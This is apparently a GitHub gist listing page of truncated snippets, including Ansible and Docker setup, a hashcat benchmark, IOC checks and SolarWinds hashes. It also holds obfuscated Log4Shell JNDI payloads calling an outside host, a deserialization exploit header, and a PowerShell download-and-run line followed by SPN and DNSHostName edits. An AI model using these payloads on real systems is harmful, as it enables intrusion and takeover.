This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- | |
- name: Configure Windows Taskbar and Install Software | |
hosts: windows | |
tasks: | |
- name: Hide the search box on the taskbar | |
win_regedit: | |
path: HKCU:\Software\Microsoft\Windows\CurrentVersion\Search | |
name: SearchboxTaskbarMode | |
data: 0 | |
type: dword |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
for pkg in docker.io docker-doc docker-compose docker-compose-v2 podman-docker containerd runc; do sudo apt-get remove $pkg; done | |
# Add Docker's official GPG key: | |
sudo apt-get update | |
sudo apt-get install ca-certificates curl -y | |
sudo install -m 0755 -d /etc/apt/keyrings | |
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc | |
sudo chmod a+r /etc/apt/keyrings/docker.asc | |
# Add the repository to Apt sources: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Benchmark is from an AI Cloud Rig: | |
https://cloud.vast.ai/?ref_id=127244 | |
hashcat (v6.2.6) starting in benchmark mode | |
Benchmarking uses hand-optimized kernel code by default. | |
You can use it in your cracking session by setting the -O option. | |
Note: Using optimized kernel code limits the maximum supported password length. | |
To disable the optimized kernel code in benchmark mode, use the -w option. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//All credit goes to Ysoserial.net and the great @tiraniddo | |
//Snippets copied from ysoserial.net | |
//https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
using System; | |
using System.Collections.Generic; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Reflection; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing ) | |
Import-ActiveDirectory | |
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose | |
#in my testing i had to set dnshostname to $null first | |
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null | |
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
${jndi:ldap://127.0.0.1:1389/ badClassName} | |
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Checks the registry for IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ | |
# If not vulnerable should return "ERROR: The system was unable to find the specified registry key or value." | |
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig" | |
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig" | |
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update" | |
# Checks the paths of IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ | |
# If not vulnerable each will return false | |
Test-Path C:\Windows\System32\Nwsapagent.sys | |
Test-Path C:\Windows\System32\helpsvc.sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-7n | |
-9s | |
-er7kj | |
-gn | |
-jc5pe | |
-jlowd | |
-ka25u | |
-lxwg8exljmcqy | |
-wwgi2xnl | |
-xhi7z |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Solarwinds Orion Hashes of Known Malicious IoCs | |
Sha256: 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 | |
Sha1: 2f1a5a7411d015d01aaee4535835400191645023 | |
Sha256: ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 | |
Sha1: d130bd75645c2433f88ac03e73395fba172ef676 | |
Sha256: 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 | |
Sha1: 76640508b1e7759e548771a5359eaed353bf1eec |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def quickWin(url, paths): | |
with open(paths, 'r') as f: | |
for path in f.read().splitlines(): |
NewerOlder